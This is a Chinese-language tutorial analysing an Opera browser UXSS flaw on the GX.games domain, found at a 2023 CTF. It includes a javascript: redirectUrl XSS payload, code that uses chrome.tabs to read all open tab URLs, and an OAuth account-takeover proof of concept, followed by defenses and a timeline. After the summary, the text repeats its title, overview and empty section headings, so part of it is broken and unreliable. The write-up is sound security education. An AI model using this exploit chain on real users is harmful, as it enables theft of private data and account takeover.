Opera浏览器严重UXSS漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
本教学文档详细分析Opera浏览器中的一个严重UXSS(通用跨站脚本)漏洞，该漏洞存在于Opera的GX.games域中，允许攻击者绕过同源策略限制，访问敏感浏览器API，最终可能导致用户隐私信息泄露和OAuth账号接管。<\/p>

漏洞发现背景<\/h2>

发现时间<\/strong>：2023年9月25日<\/li>
发现场景<\/strong>：WACON CTF 2023线下总决赛中的"operaaa"挑战题<\/li>
发现团队<\/strong>：Super Guesser团队<\/li>

预期解题路径<\/strong>：

绕过扩展中的URL检查触发XSS<\/li>
从iframe沙箱中逃逸<\/li>
找到能访问chrome.tabs()的隐藏Opera域<\/li>
泄露已打开标签页的URL(包含flag)<\/li> <\/ol> <\/li> <\/ul>
漏洞技术细节<\/h2>
XSS漏洞位置<\/h3>
漏洞存在于GX.games域的signup页面，通过redirectUrl<\/code>参数实现：<\/p>
https:\/\/gx.games\/signup\/?redirectUrl=javascript:alert(origin) <\/code><\/pre> 此URL会直接执行JavaScript代码，实现无需用户交互的XSS攻击。<\/p> 特权访问能力<\/h3> 由于GX.games属于Opera的特殊域，攻击者可以访问以下敏感API：<\/p> opr对象<\/strong>：<\/p> opr.operaIdentityPrivate.getFullname()<\/code> - 获取用户全名<\/li> opr.operaIdentityPrivate.getUseremail()<\/code> - 获取用户邮箱<\/li> 修改浏览器工作区<\/li> 更改浏览器壁纸<\/li> <\/ul> <\/li> chrome.tabs API<\/strong>：<\/p> chrome.tabs.query()<\/code> - 查询所有打开的标签页<\/li> chrome.tabs.create()<\/code> - 创建新标签页<\/li> <\/ul> <\/li> <\/ol> URL泄露攻击<\/h3> 利用chrome.tabs.query可以获取浏览器中所有打开标签页的URL和标题：<\/p> chrome<\/span>.tabs<\/span>.query<\/span>({}, (tabs<\/span>) => { <\/span><\/span> \/\/ tabs数组包含所有标签页信息，包括URL和标题 <\/span><\/span><\/span><\/span> alert<\/span>(`发现<\/span>${<\/span>tabs<\/span>.length<\/span>}<\/span>个标签页`<\/span>); <\/span><\/span>}); <\/span><\/span><\/code><\/pre>账号接管攻击链<\/h2> OAuth流程利用<\/h3> Opera Sync登录流程存在漏洞：<\/p> 攻击者生成自己的state值<\/li> 受害者登录后被重定向回带有code和账号信息的URL<\/li> 由于state不匹配，受害者看到错误页面<\/li> 攻击者利用chrome.tabs窃取完整的重定向URL(包含code)<\/li> 攻击者使用该URL登录受害者账号<\/li> <\/ol> 攻击PoC<\/h3> \/\/ 创建登录标签页 <\/span><\/span><\/span><\/span>chrome<\/span>.tabs<\/span>.create<\/span>({ <\/span><\/span> url<\/span>:<\/span> `https:\/\/auth.opera.com\/account\/confirm-identity?...&state=#Attacker_State`<\/span> <\/span><\/span>}); <\/span><\/span> <\/span><\/span>\/\/ 稍后获取所有标签页URL <\/span><\/span><\/span><\/span>setTimeout<\/span>(() => { <\/span><\/span> chrome<\/span>.tabs<\/span>.query<\/span>({}, (tabs<\/span>) => { <\/span><\/span> document.body<\/span>.innerHTML<\/span> =<\/span> ` <\/span><\/span><\/span> <h1 style="color:red"> <\/span><\/span><\/span> pwned! 用这个URL登录受害者账号:<br \/> <\/span><\/span><\/span> <textarea cols="50" rows="10"><\/span>${<\/span>tabs<\/span>[tabs<\/span>.length<\/span>-<\/span>1<\/span>].url<\/span>}<\/span><\/textarea> <\/span><\/span><\/span> <\/h1>`<\/span>; <\/span><\/span> }); <\/span><\/span>}, 9000<\/span>); <\/span><\/span><\/code><\/pre>漏洞影响范围<\/h2> 受影响产品<\/strong>：<\/p> Opera (PC、Mac、Linux)<\/li> Opera GX (PC、Mac、Linux)<\/li> <\/ul> <\/li> 严重性<\/strong>：<\/p> 跨域URL泄露<\/li> OAuth账号接管<\/li> 破坏全网OAuth保护机制<\/li> <\/ul> <\/li> <\/ul> 防御措施<\/h2> 对于开发人员<\/h3> 输入验证<\/strong>：<\/p> 严格验证redirectUrl参数，禁止javascript:等危险协议<\/li> 使用白名单机制限制重定向目标<\/li> <\/ul> <\/li> 权限隔离<\/strong>：<\/p> 限制特殊域对敏感API的访问<\/li> 实现更严格的权限控制系统<\/li> <\/ul> <\/li> OAuth加固<\/strong>：<\/p> 使用PKCE增强OAuth安全性<\/li> 确保state参数的正确验证<\/li> <\/ul> <\/li> <\/ol> 对于用户<\/h3> 及时更新Opera浏览器到最新版本<\/li> 避免在不安全环境下使用Opera登录敏感账户<\/li> 使用独立的浏览器进行重要账号操作<\/li> <\/ol> 时间线<\/h2> 2023年9月25日：漏洞在CTF比赛中被发现<\/li> 后续：漏洞被报告给Opera安全团队并获得修复<\/li> <\/ul> 总结<\/h2> 本漏洞展示了现代浏览器中特权域的安全风险，以及XSS漏洞与浏览器API结合可能造成的严重后果。通过此案例，安全研究人员可以学习到：<\/p> 特权域XSS的特殊危害性<\/li> 浏览器扩展API的安全风险<\/li> OAuth流程中的潜在攻击面<\/li> 从CTF挑战到真实漏洞挖掘的转换思路<\/li> <\/ol>

Opera浏览器严重UXSS漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> 本教学文档详细分析Opera浏览器中的一个严重UXSS(通用跨站脚本)漏洞，该漏洞存在于Opera的GX.games域中，允许攻击者绕过同源策略限制，访问敏感浏览器API，最终可能导致用户隐私信息泄露和OAuth账号接管。<\/p>

漏洞技术细节<\/h2>

账号接管攻击链<\/h2>

防御措施<\/h2>

漏洞概述<\/h2>
本教学文档详细分析Opera浏览器中的一个严重UXSS(通用跨站脚本)漏洞，该漏洞存在于Opera的GX.games域中，允许攻击者绕过同源策略限制，访问敏感浏览器API，最终可能导致用户隐私信息泄露和OAuth账号接管。<\/p>